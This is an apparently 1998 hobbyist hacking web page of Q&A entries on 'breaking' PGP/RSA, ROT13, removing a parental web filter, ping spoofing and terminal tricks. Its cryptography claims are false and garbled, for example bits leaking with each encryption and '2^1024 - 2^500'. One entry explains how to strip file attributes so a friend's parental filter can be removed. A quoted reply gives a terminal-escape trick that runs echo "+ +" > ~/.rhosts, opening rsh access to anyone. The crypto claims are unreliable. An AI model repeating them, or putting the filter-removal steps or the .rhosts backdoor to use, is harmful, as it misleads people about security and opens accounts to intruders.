would take more seconds to do than in the universe's history. Okay, so here is where our second attack come into play. It turns out (mathimatically) that portions (fractions) of bits are leaked each time you encrypt something. So if your target sends you 10,000 messages you might shave off 500 bits (a HUGE reduction in security = 2^1024 - 2^500). That logorythmically halves the security on industry grade RSA. The end result is that through a combination of attacks through brute force attacks on C with Kp and on leaked bits, the RSA algorythm becomes breakable. Scary, huh? Hasta! _________________________________________________________________ --DATE--3-18-98--PGP BREAKABLE?? II-- This is more on the above topic. This is my reply to his reply. I hope you understand. ;) Hasta! | This sounds exactly like the attack you can accomplish with ROT13, if you | don't want to take the task to pen&paper, just use ROT13 three times and | you get the original message. No fuss...no muss...... Wait, that IS the whole point of ROT13! But it should only be ONE iteration to get back from C to P. IE: [8 leprosy/user/s2/rsnake/bin] cat rot13.c #include int main() { int c; while((c=getchar())!=EOF){ if(c>='a'&&c<='m')c=c+13; else if(c>='n'&&c<='z')c=c-13; else if(c>='A'&&c<='M')c=c+13; else if(c>='N'&&c<='Z')c=c-13; putchar(c); } return 0; } [9 leprosy/user/s2/rsnake/bin] gcc rot13.c -o rot13 [10 leprosy/user/s2/rsnake/bin] rot13 Hello, this is a test. Uryyb, guvf vf n grfg. ^C [11 leprosy/user/s2/rsnake/bin] rot13 Uryyb, guvf vf n grfg. Hello, this is a test. ^C [12 leprosy/user/s2/rsnake/bin] | This only *possible* if you have a few hundred years on your hands & a cray | super'puter. With mod256? I think it is a little more doable than a couple hundred years. I don't know the exact numbers, but it should be possible within a few months (assuming you find a o that works and not the true O) Remember, we aren't trying to completely crack C, we are only trying to get a close approximation. If you get close enough, you will be able to understand the P, although possibly missing one charachter, or the structure of the text (but in the end the jist of the message has been reveled). Not 100% reliable, but most certainly broken. | Not really....seeing how the majority of the messages that people use | encryption to keep private are *time-sensitive*......thus, if someone were | to obtain a piece of encrypted mail from me intended for you RSnake...by | the time they have run their bruteforces & multiple encrypt sessions on | it....the information will be of VERY LITTLE VALUE! Think about | it.......unless you have set-up a NTFS to encrypt data on every write & | decrypt data on every read on your HD....then the messages that you send to | someone using strong crypto (*in todays convention anywayz*) usually | contains info that is imperative upon a SPEEDY reply/action. If | not....then I would take every precaution to encrypt the message ATLEAST | 4-6 times....then hide the message using steanography inside a B&W | *.bmp....this way..the message blends easier with the normal data noise | from the bmp. Just my opinion though.......always open for | discussion.....usually ending in my opinion changing! ;) First of all, your method is the ONLY way, I belive, to truely hide information. Stenography is an art which few people understand. Stenography, I belive, will have more of a following, once people realize it is just a matter of time, before modern computers and math can decrypt anything thrown at them. After talking to Kwan (the man who wrote SNOW and the ICE crypt function) I now belive that stenography is a better failsafe than any level of crypt. If they don't know something is crypted, they won't bother to crack it. Simple logic. Remove the element of curiosity. I was briefly talking to a "spy" for the airforce, whos job it was to accept incomming captured PGP messages via radio, and log them, and do some sort of decryption on the messages he got. Not to decrypt it completely but to try to evaluate the RSA algorythm used to make it potentially weaker for future conversations. With this sort of loss in security, (hundreds of bits) you could potentially decrypt incomming messages in a matter of hours. If this "spy" was doing what I think he was doing, he is mearly logging information, so that later, finding out the P would be relatively easy. Starting now, could potentially make breaking PGP in 5 years as trivial as breaking crypt login(1) is now. Of course there will always be a better version of PGP, but for those people who don't bother use strong strong primes and for those who don't bother to make their messages time sensitive, their days are numbered. ;) _________________________________________________________________ --DATE--4-1-98--X STOP-- Here is a letter I recieved about a blocking program called X Stop. | Hey there, My friend is having a "problem" with his computer.His parents | put "X Stop" on his computer.It's one of those block or filter "bad" | internet sight things.I told him to mail, but ironically enough,yours is | blocked! :) Anyways,I've been trying to help him,but the 2 files | (C:\windows\system\xblock95.dll and c:\windows\system\xstop95.exe) are | file protected so they cant be corrupted and what not.If you know anyway | to stop this program short of formatting could you please tell me?I only | ask you because I saw that earlier article on how to stop Full Armor or | something like that.Sorry for the long letter :) | Cya! C:\>attrib /? Displays or changes file attributes. ATTRIB [+R | -R] [+A | -A] [+S | -S] [+H | -H] [[drive:][path]filename] [/S] + Sets an attribute. - Clears an attribute. R Read-only file attribute. A Archive file attribute. S System file attribute. H Hidden file attribute. /S Processes files in all directories in the specified path. Hello. First let me say that I laughed out loud with that "ironically enough" story. ;) Okay, onto the question, I have never encountered this problem, but from your description it should be fairly easy. Go into MS-DOS and use the attrib command (the help file above shows the syntax). First do an attrib on those two files. It will have an R or an A preceeding the files. To make the files writable or un-archive them simply type: attrib -R xblock95.dll attrib -R xstop95.exe or attrib -A xblock95.dll attrib -A xstop95.exe That should make the files manipulative so you can either corrupt them, or move them. I hope that helps. Hasta! _________________________________________________________________ --DATE--4-21-98--Mindless Babbling-- | On your little page about hacking you said: | | Something that has come about recently in the news is the new ping | bug. Ok, let me dispell some things about this weakness. First of all | it is VERY traceable | | But isn't the ip address tagged onto ICMP packets application layer | specific and therefore spoofable?...and since you don't ever really NEED | to receive a reply from an ICMP packet...you can make it look like it | came from anywhere you like? And keeping this in mind, isn't it possible | then to spoof ICMP packets with a request for echo reply and thus take | down two machines with one fowl swoop? Well... you can spoof the packets, yes, but you cannot take down two machines at once. Once a machine that is vulnerable is attacked with the ICM packet it cannot echo reply (because it is down). Therefore you could not recieve an echo from it. Also, this is NOT untraceable if the machine you are attacking is running a current version of Bind or is watching netstat. It would be less traceable surely, however, far from perfect. | and... | | >Uhm, Carnie? Just to clarify, that "virus" is just a chain mail. | >It is totally impossible to send a virus over e-mail, is is totally | >impossible to activate it by reading it (as it e-mail is not an | >executable file, it is just text | | But is it not possible for a malicious author of an email client or | filter program to have a portion of code triggered by a particular | string of text? Of course it is. We have to rely on the validity of the code we are currently using. Same is true with the operating system you are using, you trust it is valid and backdoors aren't built into it for the most part. I wouldn't put it past Microsoft or any small software firms, but for the most part I think that is a fairly paranoid perspective (that backdoors are intentionally installed). If you are really worried about it code your own e-mail client and give out the source so people know you aren't making a backdoor yourself. ;) | and...about flash.c | | If the victim is running vt100 and has mesg y, you can mess him up pretty | bad with this. I have seen it not work, in some instances, but usually | it does | | It is possible using escape sequences to request an echo from a Wyse50 | Terminal...so you can send a command like echo "+ +" > ~/.rhosts and | request an echo from the terminal...which will make the user run the | command...but you prolly already knew that. Right, but that type of system is pretty out-dated. The term attack is not really an exploit, it is more of a trick, or a DoS if you do it right. What you are talking about is using the Wyse system to execute arbitrary commands. Your attack is completely different from the flash.c attack. I have never tried that attack, because I have never had access to a Wyse system. I will say that there are similar attacks that can be run from inside networks. Spoofing from the inside of a network, you can get machines to essentially give you information about the NFS and if the machines don't force you to authenticate it is trivial to get access to the primary name server. Active spoofing is often times more productive than passive sniffing on sub-nets. Anyway, that's enough babbling for today. Hasta! _________________________________________________________________ --END-- _________________________________________________________________ This page was created using vi (for UNIX 10.20) and Lemmy (ver 2.0b for Windows `95). It was created to work with Lynx, and all graphical and nongraphical browsers alike. If you don't like the formatting, tell me a better way to do it and I will be more than happy to let you write about 200k worth of hacking text over for me. _________________________________________________________________ [S-ALCHEMY] [RSNAKE] [LINK] No death threats or poetry please. Just kidding, no poetry please.